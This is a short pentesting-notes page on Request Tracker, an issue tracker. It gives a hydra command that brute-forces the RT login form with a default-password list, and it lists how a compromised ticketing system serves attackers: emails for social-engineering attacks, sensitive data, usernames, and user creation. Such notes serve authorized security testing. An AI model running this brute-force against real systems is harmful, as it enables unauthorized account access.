Request Tracker
Request Tracker is an open-source (0.8k β) issue tracker developed by Best Practical. The pentesting usages are a copy of osTicket usages.
You can try to brute force credentials:
$ hydra -C ftp-betterdefaultpasslist.txt IP http-post-form "/rt/NoAuth/Login.html:user=^USER^&pass=^PASS^:F=incorrect" -V -f
As a pentester, compromising a ticketing platform is often handy.
-
π We may gain access to valid emails, either to access company-only platforms or perform social attacks
-
π΅ We may gain access to sensitive information
-
π« We may find usernames for other attacks
-
π We may be able to create users